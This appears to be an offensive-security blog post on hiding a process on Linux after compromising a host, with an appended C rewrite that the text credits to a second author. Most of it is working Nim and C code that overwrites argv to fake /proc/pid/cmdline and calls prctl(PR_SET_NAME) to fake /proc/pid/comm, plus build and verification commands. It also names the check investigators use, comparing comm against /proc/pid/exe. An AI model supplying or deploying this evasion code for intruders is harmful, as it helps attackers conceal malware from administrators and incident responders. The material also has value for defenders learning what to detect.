fx2301
Process hiding in Linux

Why?

You want to evade detection after compromising a host, and make your process look innocuous to anyone who inspects /proc or runs ps.

When?

Your host is Linux, and your executable is written in C or in a language with FFI support (the example below uses Nim).

How?

There are two classes of data to spoof. Both describe the process itself, so the process can change them without any special privilege:

  1. The contents of /proc/pid/cmdline, which the kernel reads straight out of the process's own argv memory. This is what ps -f (and ps -o args) shows in its CMD column.
  2. The contents of /proc/pid/comm, which also appears as the Name: line of /proc/pid/status. This is what ps without -f (and ps -o comm) shows. It is set with prctl(PR_SET_NAME) and holds at most 15 bytes.

In Nim

```nim
import os

proc NimMain() {.cdecl, importc.}

# Raw syscall(2) wrapper; the syscall number and PR_SET_NAME come from the C headers.
proc syscall(number: clong): clong
    {.importc, varargs, header: "sys/syscall.h".}
var NR_PRCTL
    {.importc: "__NR_prctl", header: "sys/syscall.h".}: clong
var PR_SET_NAME
    {.importc: "PR_SET_NAME", header: "sys/prctl.h".}: cint

# Exported as the C entry point; compile with --noMain so Nim does not emit its own.
proc main(argc: cint, argv: cstringArray, envp: cstringArray): cint
        {.cdecl, exportc.} =
    NimMain()

    const FAKE_COMMAND = "spoofed"

    # handles /proc/pid/comm and /proc/pid/status (the kernel keeps at most 15 bytes)
    discard syscall(NR_PRCTL, PR_SET_NAME, cstring(FAKE_COMMAND))

    # handles /proc/pid/cmdline: overwrite argv[0] in place and zero whatever is
    # left of its original bytes. Never write past the original length: the other
    # argv strings and the environment strings follow argv[0] directly in memory.
    let totalLength = len(argv[0])
    let copyLength = min(len(FAKE_COMMAND), totalLength)
    for i in 0 ..< copyLength:
        argv[0][i] = FAKE_COMMAND[i]
    for j in copyLength .. totalLength:
        argv[0][j] = '\x00'

    sleep(60000)
    return 0
```

  • Compile this with --noMain so Nim does not generate its own main; the exported main calls NimMain() first to initialise the Nim runtime.
  • argv[0], the remaining argv strings and the environment strings are laid out back-to-back in memory, so a FAKE_COMMAND longer than the original argv[0] would, if copied blindly, run into argv[1] and eventually the contents of /proc/pid/environ. The code above copies at most len(argv[0]) bytes and truncates the rest; if you need the full spoofed name to show, give the executable (or its argv[0]) a name at least as long as the one you want to spoof.
  • PR_SET_NAME stores at most 15 bytes (TASK_COMM_LEN minus the terminator) and truncates silently, so keep the spoofed comm short or /proc/pid/comm and the Name: line of /proc/pid/status will show a cut-off name.
  • Neither trick touches /proc/pid/exe, /proc/pid/maps or the binary's inode. readlink /proc/<pid>/exe still resolves to the real file, and comparing comm against the basename of exe is the check an investigator will reach for, so the spoofed name is only as convincing as the binary's on-disk path.
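The same two spoofs in plain C, as an added example that is not part of the original post. It generalises the argv overwrite from argv[0] alone to the whole contiguous argv region (argv[0] through argv[argc-1], as the kernel lays them out) and bounds the copy to that region, so a spoofed name that is too long is truncated instead of spilling into the environment. The function names argv_region_len, spoof_cmdline and spoof_comm are mine, and the inputs used for checking are constructed buffers that imitate the kernel's layout.

```c
/* Added example (not the original post's code): the article's two spoofs
 * in C, with the argv overwrite bounded to the contiguous argv region so
 * it cannot run into /proc/pid/environ. */
#include <stddef.h>
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#include <unistd.h>

/* Length of the region argv[0]..argv[argc-1] that the kernel placed
 * back-to-back (each string followed by its NUL). Stops at the first
 * argv[i] that is not directly adjacent, so rewritten argv pointers cannot
 * make us scribble over unrelated memory. Excludes the final NUL. */
size_t argv_region_len(int argc, char **argv)
{
    if (argc <= 0 || argv == NULL || argv[0] == NULL)
        return 0;
    char *start = argv[0];
    char *end = argv[0] + strlen(argv[0]);
    for (int i = 1; i < argc && argv[i] != NULL; i++) {
        if (argv[i] != end + 1)
            break;
        end = argv[i] + strlen(argv[i]);
    }
    return (size_t)(end - start);
}

/* Handles /proc/pid/cmdline. Copies `name` over the argv region,
 * truncating if it does not fit, and zero-fills the remainder. The
 * region's final NUL is preserved, so the kernel's setproctitle heuristic
 * (keep reading into environ when the last byte is not NUL) is not
 * triggered. Returns the number of name bytes actually written. */
size_t spoof_cmdline(int argc, char **argv, const char *name)
{
    size_t region = argv_region_len(argc, argv);
    if (region == 0)
        return 0;
    size_t n = strlen(name);
    if (n > region)
        n = region;                          /* truncate, never overflow */
    memcpy(argv[0], name, n);
    memset(argv[0] + n, 0, region - n + 1);  /* +1 covers the final NUL */
    return n;
}

/* Handles /proc/pid/comm and the Name: line of /proc/pid/status. The
 * kernel keeps at most 15 bytes (TASK_COMM_LEN - 1) and truncates
 * silently; no privilege is needed. Returns 0 on success. */
int spoof_comm(const char *name)
{
    return prctl(PR_SET_NAME, name, 0, 0, 0);
}

int main(int argc, char **argv)
{
    const char *fake = "spoofed";
    if (spoof_comm(fake) != 0)
        perror("prctl(PR_SET_NAME)");
    size_t written = spoof_cmdline(argc, argv, fake);
    fprintf(stderr, "pid %d: comm set, %zu bytes of cmdline replaced; "
                    "/proc/%d/exe still names the real binary\n",
            getpid(), written, getpid());
    sleep(60);   /* stay alive so ps and /proc can be inspected */
    return 0;
}
```

Build with cc -o hider hider.c, start it with ./hider some args & and compare ps -o pid,comm,args -p $! with readlink /proc/$!/exe: the first two columns show spoofed, the symlink still points at the real file.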
